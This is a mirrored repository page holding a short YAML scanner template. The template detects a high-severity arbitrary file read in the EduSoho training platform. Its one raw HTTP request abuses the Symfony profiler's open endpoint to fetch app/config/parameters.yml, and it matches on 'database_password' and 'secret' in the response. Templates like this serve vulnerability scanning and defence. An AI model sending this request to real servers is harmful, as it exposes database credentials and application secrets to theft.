mirror of
https://github.com/SleepingBag945/dddd.git
synced 2025-06-10 10:12:52 +00:00
21 lines
460 B
YAML
21 lines
460 B
YAML
id: edusoho-education-open-fileread
|
|
|
|
info:
|
|
name: EduSoho 教培系统 open 文件 file 参数文件读取漏洞
|
|
author: SleepingBag945
|
|
severity: high
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "database_password"
|
|
- "secret"
|
|
part: body
|
|
condition: and |